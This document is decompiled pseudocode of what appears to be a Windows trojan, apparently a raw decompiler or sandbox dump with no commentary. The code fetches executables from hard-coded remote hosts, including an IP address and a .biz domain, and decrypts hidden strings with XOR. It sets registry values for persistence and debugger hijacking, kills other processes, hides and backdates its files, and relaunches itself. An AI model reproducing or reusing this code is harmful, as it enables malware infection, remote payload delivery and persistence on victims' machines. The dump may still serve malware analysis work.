																										__eflags =  *0x412080;
																										if( *0x412080 == 0) {
																											L546:
																											_t1156[0x18] = 8;
																											__eflags = RegQueryValueExA(_t1156[0x20], "UseExtProfile", 0,  &(_t1156[0x17]), _t1122,  &(_t1156[0x18]));
																											if(__eflags != 0) {
																												L548:
																												_t676 = E00402427(__eflags);
																												__eflags = _t676;
																												if(_t676 != 0) {
																													L558:
																													RegCloseKey(_t1156[0x1b]);
																													goto L559;
																												}
																												_push(1);
																												_push(0);
																												_t679 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																												__eflags = _t679;
																												if(_t679 == 0) {
																													L551:
																													_t1156[0x18] = 8;
																													_t1036 =  &(_t1156[0x13]);
																													_t681 = RegQueryValueExA(_t1156[0x20], "UseDflProfile", 0,  &(_t1156[0x17]),  &(_t1156[0x13]),  &(_t1156[0x18]));
																													__eflags = _t681;
																													if(_t681 != 0) {
																														_t690 = _t1156[0x16] + 0x1162f100;
																														__eflags = _t690;
																														asm("adc edx, 0xffffff9b");
																														_t1156[0x12] = _t690;
																														_t1156[0x13] = _t1156[0x17];
																													}
																													__eflags = E004014D8( &(_t1156[0x19]), _t1036) - 0x152ab;
																													if(__eflags <= 0) {
																														goto L558;
																													}
																													_t684 = E00402427(__eflags);
																													__eflags = _t684;
																													if(_t684 != 0) {
																														goto L558;
																													}
																													_push(3);
																													_push(0);
																													_t686 = E0040211B("tombul.gif", 0);
																													__eflags = _t686;
																													if(_t686 == 0) {
																														goto L558;
																													}
																													_push(8);
																													_push(_t1153);
																													_push(0xb);
																													_push(0);
																													_push("UseDflProfile");
																													L557:
																													RegSetValueExA(_t1156[0x20], ??, ??, ??, ??, ??);
																													RegCloseKey(_t1156[0x1b]);
																													 *_t1156 = 1;
																													goto L561;
																												}
																												_t1156[0x16] = _t1156[0x19].dwLowDateTime;
																												_t1156[0x17] = _t1156[0x1a];
																												_push(8);
																												_push(_t1153);
																												_push(0xb);
																												_push(0);
																												_push("UseExtProfile");
																												goto L557;
																											}
																											__eflags = E004014D8( &(_t1156[0x19]),  &(_t1156[0x16])) - 0x152ab;
																											if(__eflags <= 0) {
																												goto L551;
																											}
																											goto L548;
																										}
																										_push(3);
																										_push(0);
																										_t695 = E0040211B("grazie.gif", 0);
																										__eflags = _t695;
																										if(_t695 == 0) {
																											goto L546;
																										}
																										_t1156[0x16] = _t1156[0x19].dwLowDateTime;
																										_t1156[0x17] = _t1156[0x1a];
																										_push(8);
																										_push(_t1153);
																										_push(0xb);
																										_push(0);
																										_push("ConnPred");
																										goto L557;
																									}
																									_t697 = E00402427(__eflags);
																									__eflags = _t697;
																									if(_t697 != 0) {
																										goto L558;
																									}
																									_t699 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																									_t1131 = 0;
																									__eflags = _t699;
																									_t1037 = _t699;
																									if(_t699 != 0) {
																										_t704 = E00401E00(_t699,  &(_t1156[0x15]), 2);
																										__eflags = _t704 - 2;
																										if(_t704 == 2) {
																											_t1131 = 1;
																										}
																									}
																									E00401F59(_t1037);
																									__eflags = _t1131;
																									if(_t1131 == 0) {
																										 *0x412080 = 0;
																										goto L543;
																									}
																									 *0x412070 = _t1156[0x19];
																									_t703 = 0;
																									__eflags = _t1156[0x14] - 0x49;
																									 *0x412074 = _t1156[0x1a];
																									if(_t1156[0x14] == 0x49) {
																										__eflags = _t1156[0x14] - 0x54;
																										if(_t1156[0x14] == 0x54) {
																											_t703 = 1;
																										}
																									}
																									 *0x412080 = _t703;
																									goto L543;
																								}
																								_t706 = E004014D8(_t1153, _t1122);
																								__eflags = _t706 - 0x152ab;
																								if(_t706 <= 0x152ab) {
																									goto L546;
																								}
																								goto L532;
																								L562:
																								_t386 =  &(_t1156[0xc]);
																								 *_t386 = _t1156[0xc] + 1;
																								__eflags =  *_t386;
																								goto L563;
																							}
																						}
																						_t707 = 0x4071e0;
																						while(1) {
																							__eflags = _t707 - 0x407214;
																							if(_t707 >= 0x407214) {
																								break;
																							}
																							 *_t707 =  *_t707 ^ 0x000000d4;
																							_t707 =  &(_t707[1]);
																						}
																						_t708 = 0x4071c3;
																						while(1) {
																							__eflags = _t708 - 0x4071cf;
																							if(_t708 >= 0x4071cf) {
																								break;
																							}
																							 *_t708 =  *_t708 ^ 0x000000d4;
																							_t708 =  &(_t708[1]);
																						}
																						_t1133 =  &(_t1156[0x26]);
																						_t709 = RegCreateKeyA(0x80000002, 0x4071e0, _t1133);
																						__eflags = _t709;
																						if(_t709 == 0) {
																							RegSetValueExA(_t1156[0x2b], 0x4071c3, 0, 4,  &(_t1156[0x28]), 4);
																							RegCloseKey(_t1156[0x26]);
																						}
																						_t710 = 0x4071a0;
																						while(1) {
																							__eflags = _t710 - 0x4071c2;
																							if(_t710 >= 0x4071c2) {
																								break;
																							}
																							 *_t710 =  *_t710 ^ 0x000000d4;
																							_t710 =  &(_t710[1]);
																						}
																						_t711 = 0x407177;
																						while(1) {
																							__eflags = _t711 - 0x407188;
																							if(_t711 >= 0x407188) {
																								break;
																							}
																							 *_t711 =  *_t711 ^ 0x000000d4;
																							_t711 =  &(_t711[1]);
																						}
																						_t712 = 0x407160;
																						while(1) {
																							__eflags = _t712 - 0x407176;
																							if(_t712 >= 0x407176) {
																								break;
																							}
																							 *_t712 =  *_t712 ^ 0x000000d4;
																							_t712 =  &(_t712[1]);
																						}
																						_t713 = 0x40714a;
																						while(1) {
																							__eflags = _t713 - 0x40715f;
																							if(_t713 >= 0x40715f) {
																								break;
																							}
																							 *_t713 =  *_t713 ^ 0x000000d4;
																							_t713 =  &(_t713[1]);
																						}
																						_t714 = 0x407135;
																						while(1) {
																							__eflags = _t714 - 0x407149;
																							if(_t714 >= 0x407149) {
																								break;
																							}
																							 *_t714 =  *_t714 ^ 0x000000d4;
																							_t714 =  &(_t714[1]);
																						}
																						_t715 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t1133);
																						__eflags = _t715;
																						if(_t715 == 0) {
																							_t1041 =  &(_t1156[0x28]);
																							RegSetValueExA(_t1156[0x2b], 0x407177, 0, 4, _t1041, 4);
																							RegSetValueExA(_t1156[0x2b], 0x407160, 0, 4, _t1041, 4);
																							RegSetValueExA(_t1156[0x2b], 0x40714a, 0, 4, _t1041, 4);
																							RegSetValueExA(_t1156[0x2b], 0x407135, 0, 4, _t1041, 4);
																							RegCloseKey(_t1156[0x26]);
																						}
																						_t716 = 0x4070c0;
																						while(1) {
																							__eflags = _t716 - 0x407134;
																							if(_t716 >= 0x407134) {
																								break;
																							}
																							 *_t716 =  *_t716 ^ 0x000000d4;
																							_t716 =  &(_t716[1]);
																						}
																						_t717 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t1133);
																						__eflags = _t717;
																						if(_t717 != 0) {
																							goto L523;
																						}
																						_t719 = E00401000(0x8000);
																						_t1156[0x1d] = 0x4000;
																						_t1134 = _t719;
																						_t720 = 0x407080;
																						_t1156[0x27] = 0x4000;
																						while(1) {
																							__eflags = _t720 - 0x4070a4;
																							if(_t720 >= 0x4070a4) {
																								break;
																							}
																							 *_t720 =  *_t720 ^ 0x000000d4;
																							_t720 =  &(_t720[1]);
																						}
																						_t1156[0xd] = 0;
																						while(1) {
																							_t333 =  &(_t1134[0x4000]); // 0x4000
																							_t1039 = _t333;
																							_t724 = RegEnumValueA(_t1156[0x2d], _t1156[0x13], _t1134,  &(_t1156[0x2b]), 0,  &(_t1156[0x1e]), _t333,  &(_t1156[0x1d]));
																							__eflags = _t724;
																							if(_t724 != 0) {
																								break;
																							}
																							__eflags = _t1156[0x1c] - 1;
																							if(_t1156[0x1c] == 1) {
																								_t726 = E00401311(_t1039, 0x40708d);
																								__eflags = _t726;
																								if(_t726 != 0) {
																									RegDeleteValueA(_t1156[0x27], _t1134);
																								}
																							}
																							_t328 =  &(_t1156[0xd]);
																							 *_t328 = _t1156[0xd] + 1;
																							__eflags =  *_t328;
																							_t1156[0x1d] = 0x4000;
																							_t1156[0x27] = 0x4000;
																						}
																						_t1040 =  &(_t1156[0x55a]);
																						_t729 = wsprintfA(_t1134, 0x407080, _t1040) + 1;
																						__eflags = _t729;
																						_t1156 =  &(_t1156[3]);
																						RegSetValueExA(_t1156[0x2b], _t1040, 0, 1, _t1134, _t729);
																						E00401029(_t1134);
																						RegCloseKey(_t1156[0x26]);
																						goto L523;
																					}
																					_t747 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t1156[0x26]));
																					__eflags = _t747;
																					if(_t747 != 0) {
																						goto L483;
																					}
																					goto L480;
																				}
																				__eflags = _t592 - 0xffffffff;
																				if(_t592 == 0xffffffff) {
																					goto L472;
																				}
																				L471:
																				WriteFile(_t1084, 0x408840, 0x5e00,  &(_t1156[0x28]), 0);
																				CloseHandle(_t1156[0x28]);
																				goto L473;
																			}
																			__eflags = _t589 - 0xffffffff;
																			if(_t589 != 0xffffffff) {
																				goto L471;
																			}
																			goto L469;
																		}
																		__eflags = _t755 + 1;
																		if(_t755 + 1 != 0) {
																			L452:
																			WriteFile(_t1156[0x2c], 0x40e640, 0x1400,  &(_t1156[0x28]), 0);
																			__eflags = _t1156[3];
																			if(_t1156[3] != 0) {
																				SetFileTime(_t1156[0x2b],  &(_t1156[0x21]),  &(_t1156[0x22]),  &(_t1156[0x23]));
																			}
																			CloseHandle(_t1156[0x28]);
																			_t1156[9] = 1;
																			_push(0);
																			_push("winlogon.exe");
																			_t1043 =  &(_t1156[0x388]);
																			_t761 = E0040318D(_t1043);
																			_t1156 =  &(_t1156[3]);
																			__eflags = _t761;
																			if(_t761 == 0) {
																				_push(0);
																				_push("explorer.exe");
																				E0040318D(_t1043);
																				_t1156 =  &(_t1156[3]);
																			}
																			_push(0);
																			_push("kernel32.dll");
																			_push(_t1043);
																			L466:
																			E0040318D();
																			_t1156 =  &(_t1156[3]);
																			CreateFileA( &(_t1156[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
																			goto L467;
																		}
																		goto L464;
																	}
																	__eflags = _t581 + 1;
																	if(_t581 + 1 != 0) {
																		goto L452;
																	}
																	goto L461;
																}
																L458:
																_t1156[9] = 1;
																_push(0);
																_push("kernel32.dll");
																_push( &(_t1156[0x388]));
																goto L466;
															}
															__eflags = _t577 + 1;
															if(_t577 + 1 == 0) {
																goto L457;
															}
															goto L452;
														}
														_t1135 =  &(_t1156[0x16a]);
														_t769 = GetTempFileNameA(_t1024, "tmp", 0, _t1135);
														__eflags = _t769;
														if(_t769 == 0) {
															goto L450;
														}
														_t770 = CreateFileA(_t1135, 0x40000000, 0, 0, 2, 0x80, 0);
														_t1156[0x28] = _t770;
														__eflags = _t770;
														if(_t770 == 0) {
															goto L450;
														}
														__eflags = _t770 + 1;
														if(_t770 + 1 == 0) {
															goto L450;
														}
														L447:
														WriteFile(_t1156[0x2c], _t1156[8], _t1152,  &(_t1156[0x28]), 0);
														CloseHandle(_t1156[0x28]);
														CreateFileA( &(_t1156[0x170]), 0x80000000, 1, 0, 3, 0, 0);
														_t1136 =  &(_t1156[0x1ee]);
														_t1108 =  &(_t1156[0x162]);
														_t1072 =  &(_t1156[0x278]);
														while(1) {
															__eflags = _t1136 - _t1072;
															if(_t1136 >= _t1072) {
																goto L450;
															}
															_t778 = _t1156[0x1ee] & 0x000000ff ^  *_t1108;
															_t1108 =  &(_t1108[0]);
															 *_t1136 = _t778;
															_t1136 =  &(_t1136[1]);
														}
														goto L450;
													}
													_t1137 =  &(_t1156[0x16a]);
													_push(_t1137);
													_push(0);
													_push(0x411040);
													_push(_t1023);
													L00405E90();
													__eflags = _t571;
													if(_t571 == 0) {
														goto L442;
													}
													_push(0);
													_push(0x80);
													_push(2);
													_push(0);
													_push(0);
													_push(0x40000000);
													_push(_t1137);
													L00405DB0();
													_t1156[0x28] = _t571;
													__eflags = _t571;
													if(_t571 == 0) {
														goto L442;
													}
													__eflags = _t571 + 1;
													if(_t571 + 1 != 0) {
														goto L447;
													}
													goto L442;
												}
												RegDeleteValueA(_t564, "SubshellState");
												RegCloseKey(_t1156[0x26]);
												_t1138 =  &(_t1156[0x1ee]);
												_t1109 =  &(_t1156[0x162]);
												_t1073 =  &(_t1156[0x278]);
												while(1) {
													__eflags = _t1138 - _t1073;
													if(_t1138 >= _t1073) {
														break;
													}
													_t805 = _t1156[0x1ee] & 0x000000ff ^  *_t1138;
													_t1138 =  &(_t1138[0]);
													 *_t1109 = _t805;
													_t1109 =  &(_t1109[1]);
												}
												_push( *0x4120b0);
												_t784 =  &(_t1156[0x163]);
												_push(_t784);
												L00405E50();
												__eflags = _t784;
												if(_t784 != 0) {
													L417:
													_t1044 =  &(_t1156[0x16b]);
													SetFileAttributesA(_t1044, 0x80);
													DeleteFileA(_t1044);
													goto L431;
												}
												_push( &(_t1156[0x55a]));
												_t788 =  &(_t1156[0x1ac]);
												_push(_t788);
												L00405E50();
												__eflags = _t788;
												if(_t788 == 0) {
													_t790 = CreateFileA( &(_t1156[0x170]), 0x80000000, 1, 0, 3, 0, 0);
													_t1156[0x28] = _t790;
													__eflags = _t790;
													if(_t790 == 0) {
														goto L417;
													}
													__eflags = _t790 - 0xffffffff;
													if(_t790 == 0xffffffff) {
														goto L417;
													}
													_t791 = GetFileSize(_t790, 0);
													_t1156[0x1d] = _t791;
													__eflags = _t791 - _t1152;
													if(_t791 == _t1152) {
														_t794 = E00401000(_t1152);
														_t1139 = _t794;
														ReadFile(_t1156[0x2c], _t794, _t1152,  &(_t1156[0x28]), 0);
														_t1045 = _t1156[0x1d];
														_t1110 = _t1139;
														_t1123 = _t1156[5];
														__eflags = _t1139 - _t1139 + _t1045;
														while(__eflags < 0) {
															_t1074 =  *_t1110 & 0x000000ff;
															__eflags = _t1156[0x162] - ( *_t1123 & 0x000000ff);
															if(__eflags == 0) {
																__eflags = _t1074;
															}
															if(__eflags == 0) {
																_t1110 =  &(_t1110[1]);
																_t1123 =  &(_t1123[1]);
																__eflags = _t1110 - _t1139 + _t1045;
																continue;
															}
															E00401029(_t1139);
															goto L421;
														}
														E00401029(_t1139);
														goto L450;
													}
													L421:
													CloseHandle(_t1156[0x28]);
												}
												goto L417;
											}
											_t1046 =  &(_t1156[0x3cb]);
											_t806 = GetSystemDirectoryA(_t1046, 0x104);
											_push( *0x412090);
											_push(0x41103e);
											_push(_t1046);
											L00405E30();
											_push(_t806);
											L00405E30();
											_t807 = 0x407260;
											while(1) {
												__eflags = _t807 - 0x407286;
												if(_t807 >= 0x407286) {
													break;
												}
												 *_t807 =  *_t807 ^ 0x000000d4;
												_t807 =  &(_t807[1]);
											}
											_t808 = CreateMutexA(0, 0, "h`r@");
											_t1156[0x28] = _t808;
											__eflags = _t808;
											if(_t808 == 0) {
												Sleep(0x7d0);
											} else {
												WaitForSingleObject(_t808, 0x2710);
												CloseHandle(_t1156[0x28]);
											}
											_t1047 =  &(_t1156[0x3cb]);
											SetFileAttributesA(_t1047, 0x80);
											_t810 = CreateFileA(_t1047, 0x40000000, 0, 0, 2, 0x80, 0);
											_t1156[0x28] = _t810;
											__eflags = _t810;
											if(_t810 == 0) {
												L410:
												RegCloseKey(_t1156[0x26]);
												RegDeleteKeyA(0x80000001,  &(_t1156[0x40e]));
												goto L411;
											}
											__eflags = _t810 - 0xffffffff;
											if(_t810 == 0xffffffff) {
												goto L410;
											}
											WriteFile(_t810, 0x4072a0, 0x800,  &(_t1156[0x28]), 0);
											_t815 = E004010B2();
											_t1156[6] = _t815;
											__eflags = _t815;
											if(_t815 == 0) {
												_t1156[6] = 0xc6;
											}
											_t817 = E00401000(_t1152 + 0x64);
											 *((char*)(_t817 + _t1152)) = 0;
											_t1124 = _t817;
											_t1140 = _t817;
											_t1112 = _t1156[5];
											_t818 = _t817 + _t1152;
											while(1) {
												__eflags = _t1140 - _t818;
												if(_t1140 >= _t818) {
													break;
												}
												_t843 = _t1156[6] & 0x000000ff ^  *_t1112;
												_t1112 =  &(_t1112[0]);
												 *_t1140 = _t843;
												_t1140 = _t1140 + 1;
												_t818 = _t1124 + _t1152;
											}
											_t819 =  &(_t1156[0x55a]);
											_t1048 = _t1124 + _t1152;
											_push(_t819);
											L00405E40();
											_t1141 = _t1048 +  &(_t819[1]);
											__eflags = _t1141 - _t1048 + 0x64;
											while(__eflags < 0) {
												 *_t1141 = E004010B2();
												_t1141 = _t1141 + 1;
												_t202 = _t1152 + 0x64; // 0x64
												__eflags = _t1141 - _t1124 + _t202;
											}
											 *(_t1124 + _t1152 + 1) = _t1152;
											_t1050 = _t1124 + _t1152;
											_push( &(_t1156[0x55a]));
											_t1142 = _t1050;
											_push( &(_t1050[1]));
											L00405E20();
											_t822 =  &(_t1050[0x19]);
											while(1) {
												__eflags = _t1142 - _t822;
												if(_t1142 >= _t822) {
													break;
												}
												 *_t1142 =  *_t1142 ^ _t1156[6] & 0x000000ff;
												_t1142 =  &(_t1142[0]);
												_t211 = _t1152 + 0x64; // 0x64
												_t822 = _t1124 + _t211;
											}
											WriteFile(_t1156[0x2c], _t1124, _t1152 + 0x64,  &(_t1156[0x28]), 0);
											E00401029(_t1124);
											__eflags = _t1156[3];
											if(_t1156[3] != 0) {
												SetFileTime(_t1156[0x2b],  &(_t1156[0x21]),  &(_t1156[0x22]),  &(_t1156[0x23]));
											}
											CloseHandle(_t1156[0x28]);
											_t1051 =  &(_t1156[0x3d0]);
											CreateFileA(_t1051, 0x80000000, 1, 0, 3, 0, 0);
											E00401251(_t1156[0x26]);
											_t1156[0x27] = 1;
											_t832 = RegSetValueExA(_t1156[0x2b], "IsInstalled", 0, 4,  &(_t1156[0x28]), 4);
											_push(_t1051);
											L00405E40();
											_t833 = _t832 + 1;
											__eflags = _t833;
											RegSetValueExA(_t1156[0x2b], "StubPath", 0, 1, _t1051, _t833);
											_t1156[0xa] = 1;
											goto L410;
										}
										__eflags =  *((char*)(_t1155 + 0x1e8));
										if( *((char*)(_t1155 + 0x1e8)) != 0) {
											_push(_t1021);
											_t846 = _t1155 + 0x1bc;
											_push(_t846);
											L00405E20();
											while(1) {
												_t1052 = _t1155 + 0x1b8;
												_push(_t1052);
												L00405E40();
												__eflags = _t846 - 0xf;
												if(_t846 > 0xf) {
													goto L380;
												}
												_t846 = _t1155 + 0x1e8;
												_push(_t846);
												_push(_t1052);
												L00405E30();
											}
											goto L380;
										}
										goto L376;
									}
									_t848 = RegCreateKeyA(0x80000002, 0x408720, _t1155 + 0x98);
									__eflags = _t848;
									if(_t848 != 0) {
										goto L374;
									}
									_t1053 = _t1155 + 0x123c;
									_t849 = GetSystemDirectoryA(_t1053, 0x104);
									_push( *0x4120a0);
									_push(0x41103e);
									_push(_t1053);
									L00405E30();
									_push(_t849);
									L00405E30();
									_t850 = 0x407ae0;
									while(1) {
										__eflags = _t850 - 0x407b06;
										if(_t850 >= 0x407b06) {
											break;
										}
										 *_t850 =  *_t850 ^ 0x000000d4;
										_t850 =  &(_t850[1]);
									}
									_t851 = CreateMutexA(0, 0, 0x407ae0);
									 *(_t1155 + 0xa0) = _t851;
									__eflags = _t851;
									if(_t851 == 0) {
										Sleep(0x7d0);
									} else {
										WaitForSingleObject(_t851, 0x2710);
										CloseHandle( *(_t1155 + 0xa0));
									}
									_t1054 = _t1155 + 0x123c;
									SetFileAttributesA(_t1054, 0x80);
									_t853 = CreateFileA(_t1054, 0x40000000, 0, 0, 2, 0x80, 0);
									 *(_t1155 + 0xa0) = _t853;
									__eflags = _t853;
									if(_t853 == 0) {
										L373:
										RegCloseKey( *(_t1155 + 0x98));
										goto L374;
									}
									__eflags = _t853 - 0xffffffff;
									if(_t853 == 0xffffffff) {
										goto L373;
									}
									WriteFile(_t853, 0x407b20, 0xc00, _t1155 + 0xa0, 0);
									_t856 = E004010B2();
									 *(_t1155 + 0x1b) = _t856;
									__eflags = _t856;
									if(_t856 == 0) {
										 *(_t1155 + 0x1b) = 0x66;
									}
									_t858 = E00401000(_t1152 + 0x64);
									 *((char*)(_t858 + _t1152)) = 0;
									_t1125 = _t858;
									_t1143 = _t858;
									_t1115 =  *(_t1155 + 0x14);
									_t859 = _t858 + _t1152;
									while(1) {
										__eflags = _t1143 - _t859;
										if(_t1143 >= _t859) {
											break;
										}
										_t883 =  *(_t1155 + 0x1b) & 0x000000ff ^  *_t1115;
										_t1115 =  &(_t1115[0]);
										 *_t1143 = _t883;
										_t1143 = _t1143 + 1;
										_t859 = _t1125 + _t1152;
									}
									_t860 = _t1155 + 0x1568;
									_t1055 = _t1125 + _t1152;
									_push(_t860);
									L00405E40();
									_t1144 = _t1055 + _t860 + 5;
									__eflags = _t1144 - _t1055 + 0x64;
									while(__eflags < 0) {
										 *_t1144 = E004010B2();
										_t1144 = _t1144 + 1;
										_t130 = _t1152 + 0x64; // 0x64
										__eflags = _t1144 - _t1125 + _t130;
									}
									 *(_t1125 + _t1152 + 1) = _t1152;
									_t1057 = _t1125 + _t1152;
									_push(_t1155 + 0x1568);
									_t1145 = _t1057;
									_push( &(_t1057[1]));
									L00405E20();
									_t863 =  &(_t1057[0x19]);
									while(1) {
										__eflags = _t1145 - _t863;
										if(_t1145 >= _t863) {
											break;
										}
										 *_t1145 =  *_t1145 ^  *(_t1155 + 0x1b) & 0x000000ff;
										_t1145 =  &(_t1145[0]);
										_t139 = _t1152 + 0x64; // 0x64
										_t863 = _t1125 + _t139;
									}
									WriteFile( *(_t1155 + 0xb0), _t1125, _t1152 + 0x64, _t1155 + 0xa0, 0);
									E00401029(_t1125);
									__eflags =  *(_t1155 + 0xc);
									if( *(_t1155 + 0xc) != 0) {
										SetFileTime( *(_t1155 + 0xac), _t1155 + 0x84, _t1155 + 0x88, _t1155 + 0x8c);
									}
									CloseHandle( *(_t1155 + 0xa0));
									_t1058 = _t1155 + 0x1250;
									CreateFileA(_t1058, 0x80000000, 1, 0, 3, 0, 0);
									RegDeleteValueA( *(_t1155 + 0x9c), "Debugger");
									_t872 = E00401251( *(_t1155 + 0x98));
									_push(_t1058);
									L00405E40();
									_t873 = _t872 + 1;
									__eflags = _t873;
									RegSetValueExA( *(_t1155 + 0xac), "Debugger", 0, 1, _t1058, _t873);
									 *(_t1155 + 0x2c) = 1;
									goto L373;
								}
								__eflags = _t532 - 0xffffffff;
								if(_t532 == 0xffffffff) {
									goto L341;
								}
								_t1152 = GetFileSize(_t532, 0);
								 *(_t1155 + 0x14) = E00401000(_t886);
								ReadFile( *(_t1155 + 0xb0),  *(_t1155 + 0x20), _t1152, _t1155 + 0xa0, 0);
								CloseHandle( *(_t1155 + 0xa0));
								goto L342;
							}
							_t1059 = _t1155 + 0x145c;
							_t891 = GetSystemDirectoryA(_t1059, 0x100);
							_push( *0x4120b0);
							_push(0x41103e);
							_push(_t1059);
							L00405E30();
							L00405E30();
							_t1146 = _t1155 + 0x1568;
							_t893 = E004010F7(_t1155 + 0x1568, _t1059, _t891);
							__eflags = _t893;
							if(_t893 != 0) {
								L326:
								__eflags =  *(_t1155 + 0x20);
								if( *(_t1155 + 0x20) != 0) {
									_t906 = CreateFileA(_t1155 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
									__eflags = _t906;
									_t1062 = _t906;
									if(_t906 != 0) {
										__eflags = _t906 - 0xffffffff;
										if(_t906 != 0xffffffff) {
											SetFilePointer(_t906, 0xfffffff0, 0, 2);
											WriteFile(_t1062, 0x4120e0, 4, _t1155 + 0xa0, 0);
											CloseHandle(_t1062);
										}
									}
								}
								__eflags =  *(_t1155 + 0xc);
								if( *(_t1155 + 0xc) != 0) {
									_t899 = CreateFileA(_t1155 + 0x1470, 0x80000100, 1, 0, 3, 0, 0); // executed
									__eflags = _t899;
									_t1061 = _t899;
									if(_t899 != 0) {
										__eflags = _t899 - 0xffffffff;
										if(_t899 != 0xffffffff) {
											SetFileTime(_t1061, _t1155 + 0x84, _t1155 + 0x88, _t1155 + 0x8c); // executed
											CloseHandle(_t1061);
										}
									}
								}
								_t1147 = _t1155 + 0x145c;
								SetFileAttributesA(_t1147, 0x21); // executed
								CloseHandle( *(_t1155 + 0x10));
								_t1060 = _t1155 + 0xb28;
								GetStartupInfoA(_t1060);
								_push(_t1155 + 0xb18);
								_push(_t1060);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(_t1147); // executed
								CreateProcessA(); // executed
								L336:
								ExitProcess(0); // executed
								L337:
								 *0x412000 = 1;
								goto L338;
							}
							_push(0x104);
							_push(_t1059);
							_push( *0x4120b0);
							_push("%CommonProgramFiles%\\System\\");
							_t1126 = _t1155 + 0x1358;
							L00405E20();
							L00405E30();
							_t911 = ExpandEnvironmentStringsA(_t893, _t893, _t1126);
							__eflags = _t911;
							if(_t911 == 0) {
								L324:
								_push(0x104);
								_push(_t1059);
								_push( *0x4120b0);
								_push("%AppData%\\");
								L00405E20();
								L00405E30();
								_t912 = ExpandEnvironmentStringsA(_t911, _t911, _t1126);
								__eflags = _t912;
								if(_t912 == 0) {
									goto L337;
								}
								_t914 = E004010F7(_t1146, _t1059);
								__eflags = _t914;
								if(_t914 == 0) {
									goto L337;
								}
								goto L326;
							}
							_t911 = E004010F7(_t1146, _t1059);
							__eflags = _t911;
							if(_t911 != 0) {
								goto L326;
							}
							goto L324;
						}
						L315:
						CloseHandle( *(_t1155 + 0x10)); // executed
						goto L316;
					}
					__eflags =  *(_t1155 + 0x34) - 0x11;
					if( *(_t1155 + 0x34) > 0x11) {
						__eflags =  *(_t1155 + 0x1c);
						if( *(_t1155 + 0x1c) != 0) {
							goto L336;
						}
						E0040265F(0);
						goto L315;
					}
					_t923 = CreateToolhelp32Snapshot(2, 0);
					__eflags = _t923;
					_t1154 = _t923;
					if(_t923 == 0) {
						L304:
						__eflags =  *(_t1155 + 0x34) - 0xb;
						if( *(_t1155 + 0x34) > 0xb) {
							goto L315;
						}
						_t925 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t1155 + 0x98);
						__eflags = _t925;
						if(_t925 != 0) {
							goto L315;
						}
						 *(_t1155 + 0x30) = 0;
						_t927 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t1155 + 0x98, 0);
						__eflags = _t927;
						if(_t927 != 0) {
							L311:
							RegCloseKey( *(_t1155 + 0x98));
							goto L315;
						}
						 *(_t1155 + 0x9c) = 0x12;
						_t930 = RegQueryValueExA( *(_t1155 + 0xac), "Default Flags", 0, 0, 0x412190, _t1155 + 0x9c);
						__eflags = _t930;
						if(_t930 == 0) {
							_t933 = RegSetValueExA( *(_t1155 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
							__eflags = _t933;
							_t65 = _t933 == 0;
							__eflags = _t65;
							 *(_t1155 + 0x30) = (_t933 & 0xffffff00 | _t65) & 0x000000ff;
						}
						RegCloseKey( *(_t1155 + 0x94));
						__eflags =  *(_t1155 + 0x30);
						if( *(_t1155 + 0x30) == 0) {
							RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
						}
						goto L311;
					}
					_t937 = E004030DE(_t1155 + 0x1f8);
					 *(_t1155 + 4) = _t937;
					__eflags = _t937;
					if(_t937 == 0) {
						L283:
						_t938 = GetCurrentProcessId();
						 *(_t1155 + 0x428) = 0x128;
						_t1063 = _t938;
						_t1127 = 0;
						__eflags = 0;
						_t940 = Process32First(_t1154, _t1155 + 0x428);
						while(1) {
							__eflags = _t940;
							if(_t940 == 0) {
								break;
							}
							__eflags =  *(_t1155 + 0x430) - _t1063;
							if( *(_t1155 + 0x430) == _t1063) {
								L290:
								_t940 = Process32Next(_t1154, _t1155 + 0x428);
								continue;
							}
							_push( *0x4120b0);
							_t950 = E004010DC(_t1155 + 0x450);
							_push(_t950);
							_t1149 = _t950;
							L00405E50();
							__eflags = _t950;
							if(_t950 == 0) {
								L288:
								_t951 = OpenProcess(0x100201, 0,  *(_t1155 + 0x430));
								 *(_t1155 + 0x558 + _t1127 * 4) = _t951;
								__eflags = _t951;
								if(_t951 == 0) {
									goto L290;
								}
								_t1127 = _t1127 + 1;
								__eflags = _t1127 - 9;
								if(_t1127 > 9) {
									break;
								}
								goto L290;
							}
							_push("winrnt.exe");
							_push(_t1149);
							L00405E50();
							__eflags = _t950;
							if(_t950 != 0) {
								goto L290;
							}
							goto L288;
						}
						_t1064 = 0;
						__eflags = 0;
						CloseHandle(_t1154);
						while(1) {
							__eflags = _t1064 - _t1127;
							if(_t1064 >= _t1127) {
								break;
							}
							_t1064 = _t1064 + 1;
							SetPriorityClass( *(_t1155 + 0x55c + _t1064 * 4), 0x40);
						}
						_t1148 = 4;
						do {
							_t1065 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t1065 - _t1127;
								if(_t1065 >= _t1127) {
									goto L298;
								}
								_t1065 = _t1065 + 1;
								TerminateProcess( *(_t1155 + 0x55c + _t1065 * 4), 0);
							}
							L298:
							_t1148 = _t1148 - 1;
							__eflags = _t1148;
						} while (_t1148 >= 0);
						_t1066 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t1066 - _t1127;
							if(_t1066 >= _t1127) {
								break;
							}
							WaitForSingleObject( *(_t1155 + 0x55c + _t1066 * 4), 0x1388);
							_t1066 = _t1066 + 1;
							CloseHandle( *(_t1155 + 0x558 + _t1066 * 4));
						}
						__eflags =  *(_t1155 + 4);
						if( *(_t1155 + 4) != 0) {
							_t1067 = _t1155 + 0x21e;
							SetFileAttributesA(_t1067, 0x80);
							DeleteFileA(_t1067);
						}
						goto L304;
					}
					RegDeleteValueA(_t937, "SubshellState");
					RegCloseKey( *(_t1155 + 4));
